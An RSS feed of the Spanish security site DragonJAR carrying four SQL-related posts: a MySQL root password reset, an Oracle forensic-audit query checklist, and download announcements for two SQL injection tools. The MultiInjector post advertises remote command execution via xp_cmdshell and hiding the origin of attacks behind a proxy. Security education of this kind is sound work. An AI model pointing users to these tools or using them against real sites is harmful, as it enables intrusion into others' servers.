<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>La Comunidad DragonJAR &#187; SQL</title>
	<atom:link href="http://www.dragonjar.org/tag/sql/feed" rel="self" type="application/rss+xml" />
	<link>http://www.dragonjar.org</link>
	<description>Noticias de actualidad y seguridad informática, herramientas de seguridad, documentación y una excelente COMUNIDAD.</description>
	<lastBuildDate>Sat, 20 Mar 2010 21:50:47 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Como Recuperar Clave MySQL</title>
		<link>http://www.dragonjar.org/como-recuperar-clave-mysql.xhtml</link>
		<comments>http://www.dragonjar.org/como-recuperar-clave-mysql.xhtml#comments</comments>
		<pubDate>Fri, 22 Jan 2010 05:57:04 +0000</pubDate>
		<dc:creator>Epsilon</dc:creator>
				<category><![CDATA[COMOs]]></category>
		<category><![CDATA[GNU/Linux]]></category>
		<category><![CDATA[Aplicacion]]></category>
		<category><![CDATA[Clave]]></category>
		<category><![CDATA[clave en]]></category>
		<category><![CDATA[clave mysql]]></category>
		<category><![CDATA[Contraseñas]]></category>
		<category><![CDATA[Datos]]></category>
		<category><![CDATA[mysql]]></category>
		<category><![CDATA[mysql clave]]></category>
		<category><![CDATA[Password]]></category>
		<category><![CDATA[Root]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[Servicio]]></category>
		<category><![CDATA[Servidores]]></category>
		<category><![CDATA[SQL]]></category>
		<category><![CDATA[usuario clave]]></category>
		<category><![CDATA[usuario contraseña]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=3610</guid>
		<description><![CDATA[Una de las claves o password mas importante para todo administrador de sistemas y servidores, es la clave del usuario root de MYSQL.  Como todos sabemos lo ideal en cuanto a contraseñas es tener una diferente para cada cuenta,  esto nos ayuda  a incrementar un poco el nivel de seguridad, sin embargo, en algunas ocasiones [...]]]></description>
			<content:encoded><![CDATA[<p>Una de las claves o password mas importante para todo administrador de sistemas y servidores, es la clave del usuario root de MYSQL.  Como todos sabemos lo ideal en cuanto a contraseñas es tener una diferente para cada cuenta,  esto nos ayuda  a incrementar un poco el nivel de seguridad, sin embargo, en algunas ocasiones por culpa de la  memoria del ser humano o por otros motivos ajenos a la maquina, nadie se acuerda de la clave maestra  de este importante servicio. A simple vista  puede parecer un problema muy grave, no obstante, es algo que se puede resolver  de forma sencilla siempre y cuando tengamos acceso  al servidor con una cuenta de root, para restablecer la contraseña de mysql podemos hacer lo siguiente:</p>
<p style="text-align: center;"><img class="alignnone" title="Recuperar Clave de Mysql" src="http://farm5.static.flickr.com/4044/4293974865_b06a0f6975.jpg" alt="4293974865 b06a0f6975 Como Recuperar Clave MySQL" width="500" height="185" /></p>
<p><span id="more-3610"></span></p>
<ol>
<li>Detenemos el servicio si se esta ejecutando:</li>
<blockquote><p><code>/etc/init.d/mysql  stop</code></p></blockquote>
<li>El siguiente paso es reiniciar el servidor MYSQL en modo seguro, con los siguientes parámetros:</li>
<blockquote><p><code>mysqld_safe --skip-grant-tables --skip-networking</code></p></blockquote>
<li>Ahora, en otra consola entramos como root al servidor, de esta forma:</li>
<blockquote><p><code>mysql -u root -p mysql</code></p></blockquote>
<li>Si todo ha salido bien, debemos tener  el prompt de Mysql, en el cual  procederemos a cambiar el password, en la tabla user de la base  de datos mysql:</li>
<blockquote><p><code>UPDATE user SET Password=PASSWORD('passwordnuevo') WHERE User='root';<br />
flush privileges;</code></p></blockquote>
<li>Por ultimo solo basta  terminar el proceso de mysql-safe y reiniciar el servidor como se hace normalmente:</li>
<blockquote><p><code>pkill mysql -safe<br />
/etc/init.d/mysql start</code></p></blockquote>
</ol>
<p>Cabe resaltar que  la mejor forma de evitarse este tipo de calamidades, es bueno recordar las contraseñas, en la red existen muchas aplicaciones las cuales nos ayudan a gestionar y administrar todas nuestras contraseñas, recuerda que en la comunidad hemos proporcionado siempre información útil para <a rel="nofollow" target="_blank" title="Maneja tus Contraseñas de Forma Sencilla" rel="nofollow" href="../maneja-tus-contrasenas-de-forma-sencilla.xhtml" target="_blank">maneja tus contraseñas fácilmente</a>, <a rel="nofollow" target="_blank" title="herramientas" rel="nofollow" href="../tag/herramientas" target="_blank">herramientas</a> para <a rel="nofollow" target="_blank" title="Enlace permanente a PassPub, Generador de Contraseñas Seguras" rel="bookmark" href="../passpub-generador-de-contrasenas-seguras.xhtml">generar   contraseñas seguras</a>, e incluso aplicaciones que si no quieres utilizar una palabra clave, te permiten <a rel="nofollow" target="_blank" rel="nofollow" href="../proteccion-biometrica-al-alcance-de-todos.xhtml" target="_blank">utilizar tu rostro como contraseña</a> para que nunca pierdas una clave y no te toque recurrir a procedimientos como este.</p>
<h3  class="related_post_title">También puede interesarte...</h3><ul class="related_post"><li><a href="http://www.dragonjar.org/malas-contrasenas-para-utilizar.xhtml" title="Las Peores 500 Contraseñas de Todos los Tiempos">Las Peores 500 Contraseñas de Todos los Tiempos</a></li><li><a href="http://www.dragonjar.org/robando-claves-por-xss-del-administrador-de-contrasenas-del-firefox.xhtml" title="Robando claves por XSS del Administrador de Contraseñas del Firefox">Robando claves por XSS del Administrador de Contraseñas del Firefox</a></li><li><a href="http://www.dragonjar.org/resetear-password-de-root.xhtml" title="Resetear Password de Root">Resetear Password de Root</a></li><li><a href="http://www.dragonjar.org/generador-diccionarios-passwords.xhtml" title="CeWL &#8211; Generador de Diccionarios Personalizados">CeWL &#8211; Generador de Diccionarios Personalizados</a></li><li><a href="http://www.dragonjar.org/como-configurar-ldap-en-ubuntu-server-o-debian.xhtml" title="Cómo configurar LDAP en Ubuntu Server o Debian">Cómo configurar LDAP en Ubuntu Server o Debian</a></li><li><a href="http://www.dragonjar.org/1234-y-password-son-las-contrasenas-utilizadas-en-usa.xhtml" title="&#8220;1234&#8243; y &#8220;password&#8221; son las Contraseñas + Utilizadas en USA">&#8220;1234&#8243; y &#8220;password&#8221; son las Contraseñas + Utilizadas en USA</a></li><li><a href="http://www.dragonjar.org/como-tomar-control-dominio-windows.xhtml" title="¿Cómo tomar control de un Dominio en Windows?">¿Cómo tomar control de un Dominio en Windows?</a></li><li><a href="http://www.dragonjar.org/bits-y-qubits-camino-de-la-criptografia-partei.xhtml" title="Bits y Qubits, El camino de la criptografía &#8211; Parte I">Bits y Qubits, El camino de la criptografía &#8211; Parte I</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/como-recuperar-clave-mysql.xhtml/feed</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>¿Que Mirar Cuando Auditamos una Base de Datos Oracle?</title>
		<link>http://www.dragonjar.org/lista-de-tareas-auditar-db-oracle.xhtml</link>
		<comments>http://www.dragonjar.org/lista-de-tareas-auditar-db-oracle.xhtml#comments</comments>
		<pubDate>Fri, 13 Nov 2009 08:39:23 +0000</pubDate>
		<dc:creator>D7n0s4ur70</dc:creator>
				<category><![CDATA[Artículos sobre seguridad]]></category>
		<category><![CDATA[Seguridad Web]]></category>
		<category><![CDATA[Auditoria]]></category>
		<category><![CDATA[Base de Datos]]></category>
		<category><![CDATA[Oracle]]></category>
		<category><![CDATA[Server]]></category>
		<category><![CDATA[sistema]]></category>
		<category><![CDATA[SQL]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=3336</guid>
		<description><![CDATA[Cuando se realiza una auditoria, siempre es recomendable seguir una serie de pasos para no pasar por algo ningún detalle que pueda resultar crucial para nuestra investigación, a continuación les dejo un pequeño listado de las cosas a las que debemos echarle una ojeada cuando auditamos una base de datos oracle.

1). Determinar si en la [...]]]></description>
			<content:encoded><![CDATA[<p>Cuando se realiza una auditoria, siempre es recomendable seguir una serie de pasos para no pasar por algo ningún detalle que pueda resultar crucial para nuestra investigación, a continuación les dejo un pequeño listado de las cosas a las que debemos echarle una ojeada cuando auditamos una base de datos oracle.</p>
<p style="text-align: center;"><img src="http://farm3.static.flickr.com/2476/4100282916_b0e4fe2de0_o.jpg" alt="Auditar Base de Datos Oracle" title="¿Que Mirar Cuando Auditamos una Base de Datos Oracle?" /></p>
<p><strong>1).</strong> Determinar si en la BD esta activo el modo de operación en ARCHIVELOG o NONARCHIVELOG. Si este no esta activo, la evidencia de ataque o cambios serán sobrescritos por un nuevo redo.</p>
<p>Se puede determinar realizando una sentencia SQL a la BD:</p>
<ul>
<li>SELECT VALUE V$PARAMETER WHERE FROM NAME=&#8217;archiv_log_start&#8217;;</li>
</ul>
<p><strong><span id="more-3336"></span>2).</strong> Análisis de los Oracle Data Blocks, para determinar:</p>
<ul>
<li>Registros eliminados</li>
<li>Localizar bloques asignados a tablas (OBJETOS DE INTERÉS)</li>
<li>Seguimiento de Objetos creados y eliminados</li>
<li>Localización de tablas eliminadas</li>
<li>Localización de Funciones eliminadas</li>
</ul>
<p><strong>3).</strong> Obtención del SID de la BD</p>
<p><strong>4).</strong> Enumeración de usuarios</p>
<ul>
<li> SELECT USERID, ACTION#, RETURNCODE, TIMESTAMP# FROM SYS.AUD$;</li>
<li> SELECT USERID, COMMENT$TEXT FROM SYS.AUD$;</li>
</ul>
<p><strong>5).</strong> Consultar Ataques de Fuerza bruta o Diccionario a cuentas de usuario</p>
<ul>
<li>SQL&gt; SELECT USERID, ACTION#, RETURNCODE, TIMESTAMP# FROM SYS.AUD$;</li>
<li>SELECT NAME, LCOUNT FROM USER$ WHERE LCOUNT&gt;0;</li>
<li>SELECT NAME, LTIME FROM USER$ WHERE ASTATUS = 4;</li>
</ul>
<p><strong>6).</strong> Consulta de Ataques de Fuerza Bruta a la cuenta SYS</p>
<p><strong>7).</strong> Consulta de intentos del exploit AUTH_ALTER_SESSION</p>
<ul>
<li>SELECT USERID, ACTION#, RETURNCODE, TIMESTAMP# FROM SYS.AUD$;</li>
</ul>
<p><strong>8).</strong> Consulta de intentos de iniciar una sesiÛn la base de datos a travÈs de XML (XDB)</p>
<ul>
<li>SELECT USERID, ACTION#, RETURNCODE, TIMESTAMP# FROM SYS.AUD$;</li>
<li>SELECT COMMENT$TEXT FROM SYS.AUD$ WHERE USERID = &#8216;DBSNMP&#8217;;</li>
<li>SELECT TERMINAL,SPARE1,TIMESTAMP# FROM SYS.AUD$ WHERE USERID=&#8217;DBSNMP&#8217;;</li>
</ul>
<p><strong>9).</strong> Consulta si la Auditoria esta habilitada</p>
<ul>
<li> SELECT USER_ID, SESSION_ID, SAMPLE_TIME FROM SYS.WRH$_ACTIVE_SESSION_HISTORY ORDER BY SAMPLE_TIME;</li>
<li>SELECT USERID, ACTION#, RETURNCODE, TIMESTAMP# FROM SYS.AUD$;</li>
<li>SELECT USERID,ACTION#,TIMESTAMP#,LOGOFF$TIME FROM AUD$;</li>
</ul>
<p><strong>10).</strong> Consulta del archivo sqlnet.log,Agntsrvc.log, spfilesid.ora, o el init.ora todas las ubicaciones referentes a estos parámetros:</p>
<ul>
<li>audit_file_dest        &#8212;&#8212;-&gt; Sistema de Auditoria (ORACLE_HOME/rdbms/audit)</li>
<li>background_dump_dest    &#8212;&#8212;-&gt; archivo alert.log y tracer de procesos ($ORACLE_HOME/admin/$ORACLE_SID/bdump)</li>
<li>core_dump_dest        &#8212;&#8212;-&gt; archivos Oracle core dump ($ORACLE_HOME/DBS/)</li>
<li>db_recovery_file_dest    &#8212;&#8212;-&gt; redo logs, flashback logs, y RMAN backups</li>
<li>user_dump_dest        &#8212;&#8212;-&gt; Archivos trace debuggin procesos/usuarios (/oracle/utrc)</li>
<li>utl_file_dir        &#8212;&#8212;-&gt; Especifica uno o m·s directorios que Oracle debe utilizar para PL/SQL archivos E/S.</li>
<li>control_files        &#8212;&#8212;-&gt; Especifica uno o varios nombres de archivos de control de Oracle</li>
<li>db_create_file_dest    &#8212;&#8212;-&gt; Especifica la ubicación predeterminada de archivos de datos administrados por Oracle.</li>
<li>db_create_online_log_dest_n&#8212;-&gt; Especifica la ubicación de los redo logs y file control</li>
<li>log_archive_dest    &#8212;&#8212;-&gt; Es aplicable solo si la BD esta en modo de ARCHIVELOG</li>
<li>log_archive_dest_n    &#8212;&#8212;-&gt; Define hasta 10 archivos de registros logs.</li>
</ul>
<p><strong>11).</strong> Consulta de archivos Log Listener (ORACLE_HOME/network/admin/listener.ora) (lsnrctl status me dara la ubicación actual)</p>
<p><strong>12).</strong> Revisión de los LOGS de sentencias(SQL $ORACLE_HOME/bin/LOGIN.SQL,$ORACLE_HOME/dbs/LOGIN.SQL,$ORACLE_HOME/SQLPlus/admin/glogin.sql)</p>
<p><strong>13).</strong> Consultando informacion de los inicios de Sesion:</p>
<ul>
<li>SELECT USER_ID, SESSION_ID, SAMPLE_TIME FROM SYS.WRH$_ACTIVE_SESSION_HISTORY</li>
</ul>
<p><strong>14).</strong> Consultar una lista de usuarios y roles, usuarios con función de DBA, para buscar inconsistencias,o usuarios creados por un atacante y la generación de contraseñas fuertes con la validación de los hash, cuentas bloqueadas, tiempos de password</p>
<ul>
<li>SELECT USER#, NAME, ASTATUS, PASSWORD, CTIME, PTIME, LTIME FROM SYS.USER$ WHERE TYPE#=1;</li>
<li>SELECT U.NAME AS &#8220;GRANTEE&#8221;, U2.NAME AS &#8220;ROLE&#8221; FROM SYS.USER$ U,SYS.USER$ U2, SYS.SYSAUTH$ A WHERE U.USER# = A.GRANTEE# AND PRIVILEGE# = U2.USER#;</li>
</ul>
<p><strong>15).</strong> Consultar una lista de objetos y privilegios en el sistema</p>
<ul>
<li>SELECT U.NAME AS &#8220;GRANTEE&#8221;, P.NAME AS &#8220;PRIVILEGE&#8221;, U2.NAME AS &#8220;OWNER&#8221;, O.NAME AS &#8220;OBJECT&#8221; FROM SYS.USER$ U, SYS.USER$ U2,SYS.TABLE_PRIVILEGE_MAP P, SYS.OBJ$ O, SYS.OBJAUTH$ A WHERE U.USER# =A.GRANTEE# AND A.OBJ# = O.OBJ# AND P.PRIVILEGE = A.PRIVILEGE# AND O.OWNER#=U2.USER#;</li>
<li>SQL&gt; SELECT OBJ#, OWNER#, NAME, TYPE#, CTIME, MTIME, STIME FROM SYS.OBJ$ ORDER BY CTIME ASC;</li>
</ul>
<p><strong>16).</strong> Consulta de tablas eliminadas</p>
<ul>
<li>SELECT U.NAME, R.ORIGINAL_NAME, R.OBJ#, R.DROPTIME, R.DROPSCN FROM SYS.RECYCLEBIN$ R, SYS.USER$ U WHERE R.OWNER#=U.USER#;</li>
</ul>
<p><strong>17).</strong> Consulta de Directorios, archivos datos, archivos externos, tablas externas, buscando elementos perdidos o ubicados en sitios diferentes por el atacante.</p>
<ul>
<li>SELECT T.NAME AS &#8220;TABLESPACE&#8221;, D.NAME AS &#8220;FILNAME&#8221; FROM V$DATAFILE D, TS$ T WHERE T.TS#=D.TS#;<br />
SELECT U.NAME AS &#8220;OWNER&#8221;, O.NAME AS &#8220;DIRECTORY&#8221;, D.OS_PATH AS &#8220;PATH&#8221; FROM SYS.OBJ$ O, SYS.USER$ U, SYS.DIR$ D WHERE U.USER#=O.OWNER# AND O.OBJ#=D.OBJ#;</li>
<li>SELECT O.NAME, D.DEFAULT_DIR FROM SYS.OBJ$ O, SYS.EXTERNAL_TAB$ D WHERE D.OBJ# = O.OBJ#;</li>
</ul>
<p><strong>18).</strong> El Monitor del Sistema (SMON) MON_MOD$ Table</p>
<ul>
<li>SELECT U.NAME AS &#8220;OWNER&#8221;, O.NAME AS &#8220;OBJECT&#8221;, M.OBJ#, M.INSERTS,M.UPDATES, M.DELETES, M.TIMESTAMP FROM SYS.MON_MODS$ M, SYS.USER$ U,SYS.OBJ$ O WHERE O.OBJ#=M.OBJ# AND U.USER#=O.OWNER#;</li>
</ul>
<p><strong>19).</strong> Revision de Triggers al encendido, apagado, inicio y terminacion de sesion</p>
<ul>
<li>SELECT U.NAME AS &#8220;OWNER&#8221;, O.NAME AS &#8220;ENABLED_TRIGGER_NAME&#8221;,DECODE(T.TYPE#, 0, &#8216;BEFORE&#8217;,2, &#8216;AFTER&#8217;,'NOTSET&#8217;) AS &#8220;WHEN&#8221; FROM SYS.OBJ$ O, SYS.TRIGGER$ T, SYS.USER$ U WHERE O.OBJ#=T.OBJ# AND O.OWNER# = U.USER# AND ENABLED=1;</li>
<li>SELECT U.NAME AS &#8220;OWNER&#8221;, O.NAME AS &#8220;ENABLED_TRIGGER_NAME&#8221; FROM SYS.OBJ$ O, SYS.TRIGGER$ T, SYS.USER$ U WHERE O.OBJ#=T.OBJ# AND O.OWNER# = U.USER# AND ENABLED=1 AND BITAND(T.SYS_EVTS,1) = 1;</li>
<li>SELECT U.NAME AS &#8220;OWNER&#8221;, O.NAME AS &#8220;ENABLED_TRIGGER_NAME&#8221; FROM SYS.OBJ$ O, SYS.TRIGGER$ T, SYS.USER$ U WHERE O.OBJ#=T.OBJ# AND O.OWNER# = U.USER# AND ENABLED=1 AND BITAND(T.SYS_EVTS,2) = 2;</li>
<li>SELECT U.NAME AS &#8220;OWNER&#8221;, O.NAME AS &#8220;ENABLED_TRIGGER_NAME&#8221; FROM SYS.OBJ$ O, SYS.TRIGGER$ T, SYS.USER$ U WHERE O.OBJ#=T.OBJ# AND O.OWNER# = U.USER# AND ENABLED=1 AND BITAND(T.SYS_EVTS,8) = 8;</li>
<li>SELECT U.NAME AS &#8220;OWNER&#8221;, O.NAME AS &#8220;ENABLED_TRIGGER_NAME&#8221; FROM SYS.OBJ$ O, SYS.TRIGGER$ T, SYS.USER$ U WHERE O.OBJ#=T.OBJ# AND O.OWNER# = U.USER# AND ENABLED=1 AND BITAND(T.SYS_EVTS,16) = 16;</li>
</ul>
<p><strong>20).</strong> Consulta de librerias, que puedan estar ejecutando codigo arbitrario(malicioso)</p>
<ul>
<li>SELECT U.NAME AS &#8220;OWNER&#8221;, O.NAME AS &#8220;LIBRARY&#8221;, L.FILESPEC AS &#8220;PATH&#8221; FROM SYS.LIBRARY$ L, SYS.USER$ U, SYS.OBJ$ O WHERE O.OBJ#=L.OBJ# AND O.OWNER#=U.USER#;</li>
</ul>
<p><strong>21).</strong> Consultas de FlashBack (nuevos privilegios, derechos asignados, nuevos objetos, objetos eliminados) entre la tabla actual y la anterior en un tiempo determinado.</p>
<ul>
<li>SELECT GRANTEE#, PRIVILEGE# FROM SYS.SYSAUTH$ MINUS SELECT GRANTEE#, PRIVILEGE# FROM SYS.SYSAUTH$ AS OF TIMESTAMP(SYSDATE &#8211; INTERVAL &#8216;3600&#8242; MINUTE);</li>
<li>SELECT NAME FROM SYS.OBJ$ MINUS SELECT NAME FROM SYS.OBJ$ AS OF TIMESTAMP(SYSDATE &#8211; INTERVAL &#8216;156&#8242; MINUTE);</li>
<li>SELECT NAME FROM SYS.OBJ$ AS OF TIMESTAMP(SYSDATE &#8211; INTERVAL &#8216;156&#8242; MINUTE) MINUS SELECT NAME FROM SYS.OBJ$;</li>
</ul>
<p><strong>22).</strong> Consulta de las tablas RECYLEBIN$ y OBJ$</p>
<ul>
<li>SQL&gt; SELECT MTIME, NAME, OWNER#, OBJ# FROM SYS.OBJ$ WHERE NAME LIKE &#8216;BIN$%&#8217;;</li>
</ul>
<p><strong>23).</strong> Consultas la Administracion automatica Deshacer ( UNDOTBS01.DBF)</p>
<ul>
<li>SELECT SEGMENT_NAME,HEADER_FILE,HEADER_BLOCK,EXTENTS,BLOCKS FROM DBA_SEGMENTS WHERE SEGMENT_NAME LIKE &#8216;_SYSSMU%$&#8217;;</li>
</ul>
<p><strong>24).</strong> Consulta de los logs del Apache (Oracle Application Server)</p>
<p><strong>25). </strong>¿faltó algo? háznoslo saber en los comentarios.</p>
<p><strong>Actualizado:</strong><br />
El usuario coco, <a rel="nofollow" target="_blank" href="http://www.megaupload.com/?d=A7ATMXMD">nos comparte una serie de scripts que utiliza en su trabajo para auditar su base de datos oracle</a>, puedes basarte en ellos para auditar tu propia DB de oracle.</p>
<h3  class="related_post_title">También puede interesarte...</h3><ul class="related_post"><li><a href="http://www.dragonjar.org/nueva-clase-de-vulnerabilidad-en-bases-de-datos-sql.xhtml" title="Nueva Clase de Vulnerabilidad en Bases de Datos SQL">Nueva Clase de Vulnerabilidad en Bases de Datos SQL</a></li><li><a href="http://www.dragonjar.org/como-recuperar-clave-mysql.xhtml" title="Como Recuperar Clave MySQL">Como Recuperar Clave MySQL</a></li><li><a href="http://www.dragonjar.org/vulnerabilidad-0-day-todos-los-windows.xhtml" title="Vulnerabilidad 0-day en todas las versiones de Windows">Vulnerabilidad 0-day en todas las versiones de Windows</a></li><li><a href="http://www.dragonjar.org/video-introduccion-al-metasploit-framework-2.xhtml" title="Vídeo: Introducción al Metasploit Framework">Vídeo: Introducción al Metasploit Framework</a></li><li><a href="http://www.dragonjar.org/union-europea-aprueba-compra-sun.xhtml" title="Union Europea aprueba la compra de Sun">Union Europea aprueba la compra de Sun</a></li><li><a href="http://www.dragonjar.org/mysql-podria-morir.xhtml" title="MySQL Podria Morir, !Colabora¡">MySQL Podria Morir, !Colabora¡</a></li><li><a href="http://www.dragonjar.org/multiples-vulnerabilidades-smf.xhtml" title="Multiples Vulnerabilidades en SMF">Multiples Vulnerabilidades en SMF</a></li><li><a href="http://www.dragonjar.org/fallo-en-freebsd-permite-obtener-root-desde-cuenta.xhtml" title="Fallo en FreeBSD permite obtener root">Fallo en FreeBSD permite obtener root</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/lista-de-tareas-auditar-db-oracle.xhtml/feed</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>Código Fuente Herramienta para SQL Injection</title>
		<link>http://www.dragonjar.org/codigo-fuente-herramienta-para-sql-injection.xhtml</link>
		<comments>http://www.dragonjar.org/codigo-fuente-herramienta-para-sql-injection.xhtml#comments</comments>
		<pubDate>Wed, 28 Jan 2009 19:53:18 +0000</pubDate>
		<dc:creator>DragoN</dc:creator>
				<category><![CDATA[Herramientas Seguridad]]></category>
		<category><![CDATA[Seguridad Web]]></category>
		<category><![CDATA[.NET]]></category>
		<category><![CDATA[2009]]></category>
		<category><![CDATA[Basic]]></category>
		<category><![CDATA[Código Fuente]]></category>
		<category><![CDATA[Descargar]]></category>
		<category><![CDATA[SQL]]></category>
		<category><![CDATA[Visual]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=1929</guid>
		<description><![CDATA[Jbyte un usuario de nuestra comunidad, ha liberado el Código fuente de SqlInyection Tools, una herramienta basica para realizar sql injection.

El código fuente esta escrito en Visual Basic .NET 2005, pueden modificar el codigo y aumentar sus funcionalidades.
Descargar Codigo Fuente de Herramienta para SQL Injection.
Password: www.dragonjar.org
Mas Información:
SqlInyection Tools  JDA version 2009
Código fuente de SqlInyection [...]]]></description>
			<content:encoded><![CDATA[<p><strong><a rel="nofollow" target="_blank" title="Ver perfil de Jbyte" href="http://comunidad.dragonjar.org/profiles/jbyte-u2056.html">Jbyte</a></strong> un usuario de nuestra comunidad, ha liberado el <a rel="nofollow" target="_blank" href="http://comunidad.dragonjar.org/codigo_fuente_de_sqlinyection_tools_jda_v10beta_by_jbyte_version_2009-t2144.0.html;msg9824#msg9824">Código fuente</a> de <a rel="nofollow" target="_blank" href="http://comunidad.dragonjar.org/sqlinyection_tools_jda_v10beta_by_jbyte_version_2009-t2113.0.html">SqlInyection Tools</a>, una herramienta basica para realizar sql injection.</p>
<p style="text-align: center;"><a rel="nofollow" target="_blank" href="http://img102.imageshack.us/img102/4404/sqlinjectionly6.png"><img class="aligncenter" src="http://img102.imageshack.us/img102/4404/sqlinjectionly6.th.png" border="0" alt="SqlInyection" title="Código Fuente Herramienta para SQL Injection  " /></a></p>
<p>El código fuente esta escrito en Visual Basic .NET 2005, pueden modificar el codigo y aumentar sus funcionalidades.<span id="more-1929"></span></p>
<h2 style="text-align: center;"><a rel="nofollow" target="_blank" href="http://www.4shared.com/file/83133065/b8ed6cf/SqlInyector.html">Descargar Codigo Fuente de Herramienta para SQL Injection.</a></h2>
<p style="text-align: center;"><span style="color: #ff0000;">Password:</span> www.dragonjar.org</p>
<p><strong>Mas Información:</strong><br />
<a rel="nofollow" target="_blank" href="http://comunidad.dragonjar.org/sqlinyection_tools_jda_v10beta_by_jbyte_version_2009-t2113.0.html;msg9630#msg9630">SqlInyection Tools  JDA version 2009</a><br />
<a rel="nofollow" target="_blank" href="http://comunidad.dragonjar.org/codigo_fuente_de_sqlinyection_tools_jda_v10beta_by_jbyte_version_2009-t2144.0.html;msg9824#msg9824">Código fuente de SqlInyection Tools JDA version 2009</a></p>
<h3  class="related_post_title">También puede interesarte...</h3><ul class="related_post"><li><a href="http://www.dragonjar.org/creando-un-joiner-en-visual-basic.xhtml" title="Creando un Joiner en Visual Basic">Creando un Joiner en Visual Basic</a></li><li><a href="http://www.dragonjar.org/codigo-fuente-para-sistemas-de-matriculas-ventas-biblioteca-odontologia-administracion-de-autos-en-net-2.xhtml" title="Código fuente para Sistemas de Matriculas, Ventas, Biblioteca, Odontología, Administración de Autos en .NET">Código fuente para Sistemas de Matriculas, Ventas, Biblioteca, Odontología, Administración de Autos en .NET</a></li><li><a href="http://www.dragonjar.org/codigo-fuente-para-sistemas-de-matriculas-ventas-biblioteca-odontologia-administracion-de-autos-en-net.xhtml" title="Código fuente para Sistemas de Matriculas, Ventas, Biblioteca, Odontología, Administración de Autos en .NET ">Código fuente para Sistemas de Matriculas, Ventas, Biblioteca, Odontología, Administración de Autos en .NET </a></li><li><a href="http://www.dragonjar.org/memorias-del-disi-2009.xhtml" title="Memorias del DISI 2009">Memorias del DISI 2009</a></li><li><a href="http://www.dragonjar.org/video-explotando-wm-downloader.xhtml" title="Video: Explotando WM Downloader ">Video: Explotando WM Downloader </a></li><li><a href="http://www.dragonjar.org/como-recuperar-clave-mysql.xhtml" title="Como Recuperar Clave MySQL">Como Recuperar Clave MySQL</a></li><li><a href="http://www.dragonjar.org/lo-mejor-del-2009.xhtml" title="Lo mejor del 2009">Lo mejor del 2009</a></li><li><a href="http://www.dragonjar.org/lista-de-tareas-auditar-db-oracle.xhtml" title="¿Que Mirar Cuando Auditamos una Base de Datos Oracle?">¿Que Mirar Cuando Auditamos una Base de Datos Oracle?</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/codigo-fuente-herramienta-para-sql-injection.xhtml/feed</wfw:commentRss>
		<slash:comments>9</slash:comments>
		</item>
		<item>
		<title>MultiInjector &#8211; Herramienta Automática de Inyección SQL</title>
		<link>http://www.dragonjar.org/multiinjector-herramienta-automatica-de-inyeccion-sql.xhtml</link>
		<comments>http://www.dragonjar.org/multiinjector-herramienta-automatica-de-inyeccion-sql.xhtml#comments</comments>
		<pubDate>Mon, 22 Dec 2008 05:04:42 +0000</pubDate>
		<dc:creator>DragoN</dc:creator>
				<category><![CDATA[Herramientas Seguridad]]></category>
		<category><![CDATA[Seguridad Web]]></category>
		<category><![CDATA[Ataques]]></category>
		<category><![CDATA[Herramienta]]></category>
		<category><![CDATA[Injection]]></category>
		<category><![CDATA[Inyección]]></category>
		<category><![CDATA[MultiInjector]]></category>
		<category><![CDATA[python]]></category>
		<category><![CDATA[Shell]]></category>
		<category><![CDATA[SQL]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=1695</guid>
		<description><![CDATA[
MultiInjector es una herramienta para realizar automáticamente sql injection en un sitio especificado, al ingresarle una url o una serie de estas, automáticamente comprobara si es/son vulerable/s.
Algunas Características de esta Herramienta son:


 Recibe una lista de URL como entrada
Reconoce los parámetros URL de la lista
 Ejecución de comandos sobre el sistema operativo a distancia que [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;"><img class="aligncenter" src="http://img132.imageshack.us/img132/8669/mjcl8.jpg" alt="Herramienta Automática de Inyección SQL" title="MultiInjector   Herramienta Automática de Inyección SQL" /></p>
<p>MultiInjector es una herramienta para realizar automáticamente sql injection en un sitio especificado, al ingresarle una url o una serie de estas, automáticamente comprobara si es/son vulerable/s.</p>
<p><strong>Algunas Características de esta Herramienta son:<span id="more-1695"></span><br />
</strong></p>
<ul>
<li> Recibe una lista de URL como entrada</li>
<li>Reconoce los parámetros URL de la lista</li>
<li> Ejecución de comandos sobre el sistema operativo a distancia que  permite xp_cmdshell en el servidor SQL, posteriormente, ejecutar  cualquier comando introducido por el usuario sobre el sistema operativo</li>
<li> Conexiones paralelas configurables para aumentar la velocidad del ataque</li>
<li> Uso opcional de un proxy HTTP para ocultar el origen de los ataques</li>
<li>Entre otras&#8230;</li>
</ul>
<p><strong>Los Requisitos para ejecutarla&#8230;<br />
</strong></p>
<ul>
<li> Python &gt;= 2.4</li>
<li>Pycurl (compatible con la versión de Python)</li>
<li>Psyco (compatible con la versión de Python)</li>
</ul>
<p><a rel="nofollow" target="_blank" href="http://www.sn3akers.com/downloads/MultiInjectorV0.3.tar.gz">Puede descargar aquí MultiInjector de este enlace</a></p>
<p><a rel="nofollow" target="_blank" href="http://chaptersinwebsecurity.blogspot.com/2008/11/multiinjector-v03-released.html">Para Mas Información click aquí.</a></p>
